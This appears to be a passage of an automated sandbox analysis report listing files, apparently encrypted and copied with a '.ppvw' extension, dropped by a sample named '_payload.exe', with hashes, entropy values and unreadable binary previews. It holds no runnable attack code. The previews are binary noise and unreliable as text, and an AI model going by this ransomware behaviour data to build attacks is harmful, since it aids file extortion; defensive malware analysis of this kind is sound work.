                                                                                                                          Preview:HTAGVc..[........MW4../#...E.:..q.&5.8.LFt..x8..@.8.q........2.8/$..$.D....e.\e+@.1.Q).......S].:...<D..>>+|K.xx....W.@~.A....2.eA.dgR...4.....sV9.....c.N.V...u.-..p....m...:.Fg...$*...Mg..z..Z..s....XC..}o...e[)}Nj.........x......!1~..!.r.W;.0.'m.'.._.9.X.......O.+4.....Y.1;(....P.x?........5t.?...[..X.U1z...:s8.d ...~.J..y!:E*..K."uM...5..a.|.....8...$.....gt..........q...q.y.f...;......7....|..h..\..g.....<:....9..U!y.`h..1.&..z.......N....#A...VQ..2P!.cdD.K.%w..e...U..."~4....K...'gx200.t......-G..nQo .<?......Y...v...<z.6.]x8-I.1..]..9.i......X.P..x.9;3u.'.hc=..>..)*].x.Y.C....k*G..O.P.....z.....Q.x...Yjm.& ..o6..WW.k+...-..-zm...C\..1.x\*..>..:.&.MP4P.2.....L.n...p..L|..G.t....,....C.).jV.^,u.8n.....:.%...j.'.I+Z$.v...c]..B...z2..|.TF{t.E1....S.`....-...4..=-g.".....n>.4.~o...CY..D.M..n;.xA.f.r"Bc..U...2....,O=.S....Qz......~..|.......\..6...xC~rt.....ld.}..;.....K..4...2....66.:...M.c&'E|.......\'@tX.......|.vsj.q..~..|.......C...

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8440945534032664
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hTL3REU4/7AJUFBeZZibFnHv/hidE10vKgzaeu9+PkfHokNEYvVuP/Vr3C+bD:hT7RX+7AigZyh+E1gK2ue0IxPk8D
                                                                                                                          MD5:9EA66E95FC29A97B8AE85781C944F65A
                                                                                                                          SHA1:67524E7AE3DE07826CEF6CFE70F6AFF6E18B49FE
                                                                                                                          SHA-256:371C420EF8FB27EE48E27348297DE596DD0DB31FF86852C12B99EBBE0EB8C848
                                                                                                                          SHA-512:0A672805E6B41BCBBCFDD2DB78F29A88A2FCFC661CA15D22A01F8A3AECAA5011A80EBCF1B9A749315844AD48B918E1933A8A8AD963528D4E4655F132D2D82420
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY@.......{...+.......^.........J.u.j}p@.M<jV......Xq....x.(.51.... .7=0....t....K.J.J..... ..~..[.R..B~..R=N...6........&....2...KL...dXt{u..m........z8y..-..U....Q+2.....L.?)6...F....jy.a.../."7...q1.kA...R.a%...6.U'....p..]e...#o\...'qv......D....t.y+z-...|.......f.W{y.Kx(.:2<....X.[\.)...JZ..W.T.I.Y.8cZ.;.... y/]....XH...Bc.....*F@..tzwP '...".1..0.921..oG{n.{.....S..@..n...95!%.!...3...+._....'.......M.-u+..,4T3...d..&$....H2......G.....t<.J..&.u6I...c..i*.LYU/xv......N .....f[.+p.G...-S0.cR...f6..D*3.....?*.6...`f..I$Z.L........9o4Y^P......<.&......b.bL]....h.!.+r.B.Ey...?g..'...5.h...g.H...U?.|......Fy.)yj.HI.? \z..t.$EFH..5.D.UZ...4...m..T.i,H..J.f.'..N.GM.....u..z...S......1.....(.W.0...1n..U..Q.....P.J7..a1...D<a.7..........6 ........4...4{1|.Y..g.09G.m.G....T.~y...l..A...Hy..O.Q....g.......\.*......wX.k-.'*`.P.K....'.....<._..g.3Z...d.[...#6...;.q...}.tRI._.6....9.=...8.\...u..!.%..vs...t...;0'...&."x.BKe.eM<.8.....$...Xy_.....q).

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8440945534032664
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hTL3REU4/7AJUFBeZZibFnHv/hidE10vKgzaeu9+PkfHokNEYvVuP/Vr3C+bD:hT7RX+7AigZyh+E1gK2ue0IxPk8D
                                                                                                                          MD5:9EA66E95FC29A97B8AE85781C944F65A
                                                                                                                          SHA1:67524E7AE3DE07826CEF6CFE70F6AFF6E18B49FE
                                                                                                                          SHA-256:371C420EF8FB27EE48E27348297DE596DD0DB31FF86852C12B99EBBE0EB8C848
                                                                                                                          SHA-512:0A672805E6B41BCBBCFDD2DB78F29A88A2FCFC661CA15D22A01F8A3AECAA5011A80EBCF1B9A749315844AD48B918E1933A8A8AD963528D4E4655F132D2D82420
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY@.......{...+.......^.........J.u.j}p@.M<jV......Xq....x.(.51.... .7=0....t....K.J.J..... ..~..[.R..B~..R=N...6........&....2...KL...dXt{u..m........z8y..-..U....Q+2.....L.?)6...F....jy.a.../."7...q1.kA...R.a%...6.U'....p..]e...#o\...'qv......D....t.y+z-...|.......f.W{y.Kx(.:2<....X.[\.)...JZ..W.T.I.Y.8cZ.;.... y/]....XH...Bc.....*F@..tzwP '...".1..0.921..oG{n.{.....S..@..n...95!%.!...3...+._....'.......M.-u+..,4T3...d..&$....H2......G.....t<.J..&.u6I...c..i*.LYU/xv......N .....f[.+p.G...-S0.cR...f6..D*3.....?*.6...`f..I$Z.L........9o4Y^P......<.&......b.bL]....h.!.+r.B.Ey...?g..'...5.h...g.H...U?.|......Fy.)yj.HI.? \z..t.$EFH..5.D.UZ...4...m..T.i,H..J.f.'..N.GM.....u..z...S......1.....(.W.0...1n..U..Q.....P.J7..a1...D<a.7..........6 ........4...4{1|.Y..g.09G.m.G....T.~y...l..A...Hy..O.Q....g.......\.*......wX.k-.'*`.P.K....'.....<._..g.3Z...d.[...#6...;.q...}.tRI._.6....9.=...8.\...u..!.%..vs...t...;0'...&."x.BKe.eM<.8.....$...Xy_.....q).

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842116301089104
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:95xAFJiLNKBsQ1hXxA1aeDD9FoCPpRVqWR0ii5s7ZBJ/UIiuAOcZcIAjNWxuYZbD:EJiL4Bs4hAFDwCPpRVqWR797Zz/8uKie
                                                                                                                          MD5:7BE54009FC1B4118031D41195D93A63A
                                                                                                                          SHA1:5E1BA5F00DADB98E7947988B5C2E2FEAD47DB86B
                                                                                                                          SHA-256:A9043B38D8D9FEC55B887C10816E1657037B46AB8DE23E61A73F0C701A8A0A80
                                                                                                                          SHA-512:912408D6B26269CFCBEC27FE2D8EE63BD3D9A6FD819BEEECDECE9F27DD0CCBCE16EA21A22EE345AB17DC772AB77DE1239D625682A63E9444085A5D8918EF50FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS.t.h.C.B.X...x.../.Fbz.1...............y.w....l..7......x....\$Z$.`.u.@......t.8.*..Q....%..,..e.0.......0Q.pr.k..8.......q9.....>.....f..u.....MA..G...y\Xp:...7.D............!...s.U.......W><..:l..-.b9;z)...WX(N!...mT<.bwc.G....f .r.G/..^.{..f..t.t.mQ./.+%.\i..;,.#8...gO.O.t)`.Ht$'..q..y^X...jU(M@S..e.QBH..s...9..A,....?.J...Y..$..40...P........O\.......z.................L.<...^y.>..h:...8E..m.Q..Kk...9..Z.^?g.....9=/........y...r.c..:Z.q...[...t.{j..kf.E.=r*k..I`....^{4.ts...',.sL~.. (V.uw+J.ZdMrV6..(i4 .e7.mg...5...jZ..I...........6..%J.....sc..R.{)..[../O.D...OE..S..{.M..{.N........g...7v......j....PM..Z...-P...^B....H..5..H...z......#..I3..D..V.dC../....`..2..B[......).C..M....v.........!....5..f..q..ly@.~...r.b..7..D3..2(....[.y.)d].z%q...R.9.(f1......J..K..,.....OFn..z...u.^(s.om..P....m(..AI....,..,.o........5."..-q..].Fp.S{'.jW.u........,...!... .=.i....AE.b.[5...[..[1..V..1o..,%.&.Z.h.%.^..-lC.yjb..X,.+......%..b'.....w..>ti.

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842116301089104
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:95xAFJiLNKBsQ1hXxA1aeDD9FoCPpRVqWR0ii5s7ZBJ/UIiuAOcZcIAjNWxuYZbD:EJiL4Bs4hAFDwCPpRVqWR797Zz/8uKie
                                                                                                                          MD5:7BE54009FC1B4118031D41195D93A63A
                                                                                                                          SHA1:5E1BA5F00DADB98E7947988B5C2E2FEAD47DB86B
                                                                                                                          SHA-256:A9043B38D8D9FEC55B887C10816E1657037B46AB8DE23E61A73F0C701A8A0A80
                                                                                                                          SHA-512:912408D6B26269CFCBEC27FE2D8EE63BD3D9A6FD819BEEECDECE9F27DD0CCBCE16EA21A22EE345AB17DC772AB77DE1239D625682A63E9444085A5D8918EF50FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS.t.h.C.B.X...x.../.Fbz.1...............y.w....l..7......x....\$Z$.`.u.@......t.8.*..Q....%..,..e.0.......0Q.pr.k..8.......q9.....>.....f..u.....MA..G...y\Xp:...7.D............!...s.U.......W><..:l..-.b9;z)...WX(N!...mT<.bwc.G....f .r.G/..^.{..f..t.t.mQ./.+%.\i..;,.#8...gO.O.t)`.Ht$'..q..y^X...jU(M@S..e.QBH..s...9..A,....?.J...Y..$..40...P........O\.......z.................L.<...^y.>..h:...8E..m.Q..Kk...9..Z.^?g.....9=/........y...r.c..:Z.q...[...t.{j..kf.E.=r*k..I`....^{4.ts...',.sL~.. (V.uw+J.ZdMrV6..(i4 .e7.mg...5...jZ..I...........6..%J.....sc..R.{)..[../O.D...OE..S..{.M..{.N........g...7v......j....PM..Z...-P...^B....H..5..H...z......#..I3..D..V.dC../....`..2..B[......).C..M....v.........!....5..f..q..ly@.~...r.b..7..D3..2(....[.y.)d].z%q...R.9.(f1......J..K..,.....OFn..z...u.^(s.om..P....m(..AI....,..,.o........5."..-q..].Fp.S{'.jW.u........,...!... .=.i....AE.b.[5...[..[1..V..1o..,%.&.Z.h.%.^..-lC.yjb..X,.+......%..b'.....w..>ti.

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854407180089583
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ee7FDsyTGsClm+bB6Ooz7KKU7i03i6ptyNFrRVXcJdz1CgBnj5bD:t7/8Doz7Kb7r33yDrjXk53lD
                                                                                                                          MD5:991F2C419A767A314870DCDB6C092625
                                                                                                                          SHA1:40DDF4F1673EB48004DE1AACF24A682A71494404
                                                                                                                          SHA-256:3EAD2E917E786E07D6DF1A5E418C78E258C6F0B231CBA7EE5447AF03632505C2
                                                                                                                          SHA-512:52DF35529585E983130DF18F689E69D634065A0BBC62A245967AB98458FE66160469C7E45209EC8156B02CDEA62A0BA45081B36FB8EE08484DB1B8FCA2405DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBDf..x.G....e.].......5/h.{.6.......D;..C.]}3.X._..C1...`...@B^.`..H.....:.[u.|.-b..CE...O4....7..<..."ih.1......ck.X.....>.$.@..9g..Wg..a......$3..o.H..Z..O.}4...y.S.NY!. \.8.}..N1...{./l.1...._..+<....on...vL....y.V..B.>R:V.(.X.D...a3.\.............%Q.F.0f^.m..sP..)....RR...u.qy.%~...+.*..N......7.dC{.>./.<'.Os.q3...n...jh=.6.l..L+...48.......Y...i.NcYf..?.<.y...k..i.y...".?_..%3.X}.4Us....n..Z.......:..LD.c..89p.)....*8.:.2.$..Ih\......w../.a..g].t}d.....rGr.....x.....f.iZ~9.j.<.b&.`..Br...r7(..;..-..M.E.].....j;.x.......2...@.-..'.....G.#....!...f..o_...d..2|Z...l...#t....".u. XK 0'..'.L.Kpf.......8......[.... ..@.<"E.Y..=..Ir7}.{0..S..g............4.M....s^-..0=.De..x]%m.../.[.M.d...+.....{.HR.....1.-.=N3.3........mm?..1s.B.J3w......(..c.;c-..c..M.d .02.]5..a...c..@SXA./..N.0.K..q..=+...z.h..sA....lB^..m.`.U@G..:}$Y..oB..s(b.......I..nx;.i.e..l.R*...5K..}o.......i(.U$m..|.....Kh98...)Rv....wuO...].z."^R.%.u..\\.8..G.-....

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854407180089583
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ee7FDsyTGsClm+bB6Ooz7KKU7i03i6ptyNFrRVXcJdz1CgBnj5bD:t7/8Doz7Kb7r33yDrjXk53lD
                                                                                                                          MD5:991F2C419A767A314870DCDB6C092625
                                                                                                                          SHA1:40DDF4F1673EB48004DE1AACF24A682A71494404
                                                                                                                          SHA-256:3EAD2E917E786E07D6DF1A5E418C78E258C6F0B231CBA7EE5447AF03632505C2
                                                                                                                          SHA-512:52DF35529585E983130DF18F689E69D634065A0BBC62A245967AB98458FE66160469C7E45209EC8156B02CDEA62A0BA45081B36FB8EE08484DB1B8FCA2405DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBDf..x.G....e.].......5/h.{.6.......D;..C.]}3.X._..C1...`...@B^.`..H.....:.[u.|.-b..CE...O4....7..<..."ih.1......ck.X.....>.$.@..9g..Wg..a......$3..o.H..Z..O.}4...y.S.NY!. \.8.}..N1...{./l.1...._..+<....on...vL....y.V..B.>R:V.(.X.D...a3.\.............%Q.F.0f^.m..sP..)....RR...u.qy.%~...+.*..N......7.dC{.>./.<'.Os.q3...n...jh=.6.l..L+...48.......Y...i.NcYf..?.<.y...k..i.y...".?_..%3.X}.4Us....n..Z.......:..LD.c..89p.)....*8.:.2.$..Ih\......w../.a..g].t}d.....rGr.....x.....f.iZ~9.j.<.b&.`..Br...r7(..;..-..M.E.].....j;.x.......2...@.-..'.....G.#....!...f..o_...d..2|Z...l...#t....".u. XK 0'..'.L.Kpf.......8......[.... ..@.<"E.Y..=..Ir7}.{0..S..g............4.M....s^-..0=.De..x]%m.../.[.M.d...+.....{.HR.....1.-.=N3.3........mm?..1s.B.J3w......(..c.;c-..c..M.d .02.]5..a...c..@SXA./..N.0.K..q..=+...z.h..sA....lB^..m.`.U@G..:}$Y..oB..s(b.......I..nx;.i.e..l.R*...5K..}o.......i(.U$m..|.....Kh98...)Rv....wuO...].z."^R.%.u..\\.8..G.-....

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.843556977193078
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZdDrnb28kjwQhFOIdxy1IgrWeBwFDxysk/Thc9o3DfJzlbD:ZFrny8gOwxy1Iy0RktUE1D
                                                                                                                          MD5:AFBE88F4474223396A405877D2651ECB
                                                                                                                          SHA1:671D3E9044773E348984F9B48BA4E75B23F76E4B
                                                                                                                          SHA-256:F2215F9B619F6712E1BBA6819643F77D01EAC8064021E811EE67594A7C1A1AC4
                                                                                                                          SHA-512:45736851E6A9BC4FDCA5277714DEEFD68A90C56AB9E62F3220B9EEF7B04E59A02814B741152A1C12613FAE6A614D3415C4A0F0918DDC9B624EB0F91430F41D38
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN..q.j..i....dN.....^..f...e........O..=..d}..`..;.L_.......m[.....>...{....X...qInB....q...8..!mm....+.!.._...?.c.e...|.....?..?....../.J.]J...}.._V.b_..RI.M.......A*:.n..ed...c.3.../..@.....R..}.r.....X..]Vh....n...,-v......\.1..)....1A.U)....rp..!r{w..p-.1.f...V..n~...K......;N{.K....K./.......+....t~.7J..#..f.?.J..m..H..:...x...;..g.."=w..%.ca.XR.z:\T.x.....X...n.d.9n.d..\Kc.t...Z.C..h>....7...>Q.E....1;m.0..j..9u.....2h.U......,r=W...n.^I..<.c.0.1..k..f.%V..*.P>.b.....r..$.gX.*..p.....&.o...3d......iw.......a..-..'..*...j.. .eh..t..A..5&S..(...8..m....;"|..\..5.{be.m^....~......b...I.k.X*%sN.P.a.-X8.w.......:..Yoy..E....D.j...p..mR.<....,.$..^q4..V,.....R.....6E.l.|..Cl..5@o. ....n:;...^..4I...<*-.=..7E@#..<....<...X....(/).:5..2f..l.S...7..J/&s|..J.Pd..(^,.FB6.J...@....e.l...x{-.....o!y.p....pR..5.....J...5V.4h@...&|2./.7[f....^.b..]r%..6"%.....|V`../.\$.$W3............A....>0.. ..N.....\.C......b.N..}..\-.h8/5.......$9.....P

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.843556977193078
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZdDrnb28kjwQhFOIdxy1IgrWeBwFDxysk/Thc9o3DfJzlbD:ZFrny8gOwxy1Iy0RktUE1D
                                                                                                                          MD5:AFBE88F4474223396A405877D2651ECB
                                                                                                                          SHA1:671D3E9044773E348984F9B48BA4E75B23F76E4B
                                                                                                                          SHA-256:F2215F9B619F6712E1BBA6819643F77D01EAC8064021E811EE67594A7C1A1AC4
                                                                                                                          SHA-512:45736851E6A9BC4FDCA5277714DEEFD68A90C56AB9E62F3220B9EEF7B04E59A02814B741152A1C12613FAE6A614D3415C4A0F0918DDC9B624EB0F91430F41D38
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN..q.j..i....dN.....^..f...e........O..=..d}..`..;.L_.......m[.....>...{....X...qInB....q...8..!mm....+.!.._...?.c.e...|.....?..?....../.J.]J...}.._V.b_..RI.M.......A*:.n..ed...c.3.../..@.....R..}.r.....X..]Vh....n...,-v......\.1..)....1A.U)....rp..!r{w..p-.1.f...V..n~...K......;N{.K....K./.......+....t~.7J..#..f.?.J..m..H..:...x...;..g.."=w..%.ca.XR.z:\T.x.....X...n.d.9n.d..\Kc.t...Z.C..h>....7...>Q.E....1;m.0..j..9u.....2h.U......,r=W...n.^I..<.c.0.1..k..f.%V..*.P>.b.....r..$.gX.*..p.....&.o...3d......iw.......a..-..'..*...j.. .eh..t..A..5&S..(...8..m....;"|..\..5.{be.m^....~......b...I.k.X*%sN.P.a.-X8.w.......:..Yoy..E....D.j...p..mR.<....,.$..^q4..V,.....R.....6E.l.|..Cl..5@o. ....n:;...^..4I...<*-.=..7E@#..<....<...X....(/).:5..2f..l.S...7..J/&s|..J.Pd..(^,.FB6.J...@....e.l...x{-.....o!y.p....pR..5.....J...5V.4h@...&|2./.7[f....^.b..]r%..6"%.....|V`../.\$.$W3............A....>0.. ..N.....\.C......b.N..}..\-.h8/5.......$9.....P

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\LTKMYBSEYZ.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.855120106588113
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:v+Guhy9MpFnx6pwFpt7Zwjp4TuLzD5sVmtdILOs/7nsxIzkDU875k5ZfPV7vapBq:WGuh6MpT6qFT2jptLz8mtKOs/qIzJQQr
                                                                                                                          MD5:2AF197363B24B12D1C4D5179934E164F
                                                                                                                          SHA1:A66C96B098A6AFB69D9481C522F61B100DA8A7E1
                                                                                                                          SHA-256:B28D4E002B7917950A105BFD587BAE79A2AC1A3681BAA9A403816C5619A168D4
                                                                                                                          SHA-512:08AB681FB1FC543470E8C0595BCC5EB84B46C842E67B70086F920A6CB8B6D53C35B6D5A81288EABCAE250C78D507F91853CB0129EC6AA0C865E8D2778AB53CCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY:...]..A"...Z..B._..A...uY.v....`@.~..$.o.?d......>.-u.. .........$.-+.I.F..uF.{.n..\...e...........tM.P$.....H....Npa.t.]..Y..W....|.M..._....l...Zw..H".Y...._..~jQ...O..rM'F?....r.a=....W.x....@.jnn...0J. .D.ls2......1.Qx...mF.I..5.R.3}!.84..W..b...B....K..pH(.'?Z...>.A....@.N;...;.DL.>.....7Tf....r..9.V. ...KC...w..x.o..ti..x......oF.H.|XKf...xv:.z.$_0........i.$..`....\.).&.)......o.....|4..PL,..sr..N......X..7.md...%...{l..*..:`.L!..K....}...o..</.G.[..J.....e....@7=..)H.Y..$.8<..N...#....F..'.....W.o.+..L..0.....#M....v5..Y......q:b5.al.J...n.X..'..X...B,..b.(.$H..or...=j.^..q..3..........[.[/......w.fu.0.G??...u".......i...^..9.....(Kv..L.`.pQkG..6.>.._..5.\.q.+...Z..n..+......sd.K9........x.]6...;.Y.;.}..-.`....'q./T1.9..9.y.uZ....'...F...h=.vO...&Y.J7..|...|.:..~SC.M.... w2v%14.k..8.G....mK........./....D.......E.#...@E.....F..9Z...Y.f......n. ....9.y.,.R..N....:9..UB...-e.[~..Y..hW.....n....~...;$Cq...s.9b..kf......t

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\LTKMYBSEYZ.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.855120106588113
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:v+Guhy9MpFnx6pwFpt7Zwjp4TuLzD5sVmtdILOs/7nsxIzkDU875k5ZfPV7vapBq:WGuh6MpT6qFT2jptLz8mtKOs/qIzJQQr
                                                                                                                          MD5:2AF197363B24B12D1C4D5179934E164F
                                                                                                                          SHA1:A66C96B098A6AFB69D9481C522F61B100DA8A7E1
                                                                                                                          SHA-256:B28D4E002B7917950A105BFD587BAE79A2AC1A3681BAA9A403816C5619A168D4
                                                                                                                          SHA-512:08AB681FB1FC543470E8C0595BCC5EB84B46C842E67B70086F920A6CB8B6D53C35B6D5A81288EABCAE250C78D507F91853CB0129EC6AA0C865E8D2778AB53CCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY:...]..A"...Z..B._..A...uY.v....`@.~..$.o.?d......>.-u.. .........$.-+.I.F..uF.{.n..\...e...........tM.P$.....H....Npa.t.]..Y..W....|.M..._....l...Zw..H".Y...._..~jQ...O..rM'F?....r.a=....W.x....@.jnn...0J. .D.ls2......1.Qx...mF.I..5.R.3}!.84..W..b...B....K..pH(.'?Z...>.A....@.N;...;.DL.>.....7Tf....r..9.V. ...KC...w..x.o..ti..x......oF.H.|XKf...xv:.z.$_0........i.$..`....\.).&.)......o.....|4..PL,..sr..N......X..7.md...%...{l..*..:`.L!..K....}...o..</.G.[..J.....e....@7=..)H.Y..$.8<..N...#....F..'.....W.o.+..L..0.....#M....v5..Y......q:b5.al.J...n.X..'..X...B,..b.(.$H..or...=j.^..q..3..........[.[/......w.fu.0.G??...u".......i...^..9.....(Kv..L.`.pQkG..6.>.._..5.\.q.+...Z..n..+......sd.K9........x.]6...;.Y.;.}..-.`....'q./T1.9..9.y.uZ....'...F...h=.vO...&Y.J7..|...|.:..~SC.M.... w2v%14.k..8.G....mK........./....D.......E.#...@E.....F..9Z...Y.f......n. ....9.y.,.R..N....:9..UB...-e.[~..Y..hW.....n....~...;$Cq...s.9b..kf......t

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863120803251086
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:x5YajdD+t5VAg7GYmH3N19+91ZT7ytEbbIzW2Yh9nYepD1GbD:PJ1+to0G73x+9vT7ytEAzW2snYQJUD
                                                                                                                          MD5:477BA056828D0173B360D36185DD4FCD
                                                                                                                          SHA1:56A6F09CEB537B87D98633A70BABDC7A23901E5C
                                                                                                                          SHA-256:9BCBC6ED324BF8A05ECDFB8055862625099171E3FB5FA2DF37F0CF5FF8344CEE
                                                                                                                          SHA-512:1BF52425A07D81B0D8E313F771DDFA67D224ADE530C8260F10BCA98F3FF71FADC4FB8EF51C2D98C9D38B748AC112AD65B4EB23955DE7F0E0FA084B028FABE3DC
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ}......DU.2.;...........K.l.7..m!.I......34..F....+....g.za.W..!%4..]..y.C1.z.....x.$0."S.{....[...U%...(..o....'.....I.y..d.....x<...mx.`...1..QE.yO........F...X0%.B..k.J...|Q.$.%[...v.......N.b85.-.....^..^...;...9.;...q.na.:.Q.Z.m>...re.[.WL$(..9....$......PNpt.O.A...?...wj3..S....b].d..ft..ju.!.9.. 3....y.v4...S.|..F,_mC2....q>..r.'o>z......m\.....p....+...Tx&..{.'.S.g....d.4.+'.....r...1.....C..g9.).".hg.E.G.2=......l......U.......Z.?.<.G..)..K........g...<..d.j.(....E.k....(....C.9.K2.......:^...e.S.].%....a......n.g|...`h....pJ.H..2Tr./.f2..(=.{..am....Wd}..L...6.sI.N.}..9a..4U.W..w).\.zYVB......P..a../L.....]..{.ti...kg.....<S..9=..f..f.A.E..Jj.,.{.E."^..}......o..nt..W...@.\g.....t0n..iy.jI.5s.......(oJI.=.p)......!......&....k....6..~.lWd..?......"..k...)|.e.g.e.....).gEf..W..9N..R.M3.u.......*".j..{p.W..G.U^yB}.nI..9.......V...^7.R....Oj.0...|.D..:.N...g.P.e.X..+......._/.,.....~......~..!.2m.........%m6u.j,Z.d.V5.r?...

                                                                                                                          C:\Users\user\Desktop\UMMBDNEQBN\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863120803251086
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:x5YajdD+t5VAg7GYmH3N19+91ZT7ytEbbIzW2Yh9nYepD1GbD:PJ1+to0G73x+9vT7ytEAzW2snYQJUD
                                                                                                                          MD5:477BA056828D0173B360D36185DD4FCD
                                                                                                                          SHA1:56A6F09CEB537B87D98633A70BABDC7A23901E5C
                                                                                                                          SHA-256:9BCBC6ED324BF8A05ECDFB8055862625099171E3FB5FA2DF37F0CF5FF8344CEE
                                                                                                                          SHA-512:1BF52425A07D81B0D8E313F771DDFA67D224ADE530C8260F10BCA98F3FF71FADC4FB8EF51C2D98C9D38B748AC112AD65B4EB23955DE7F0E0FA084B028FABE3DC
                                                                                                                          Malicious:false
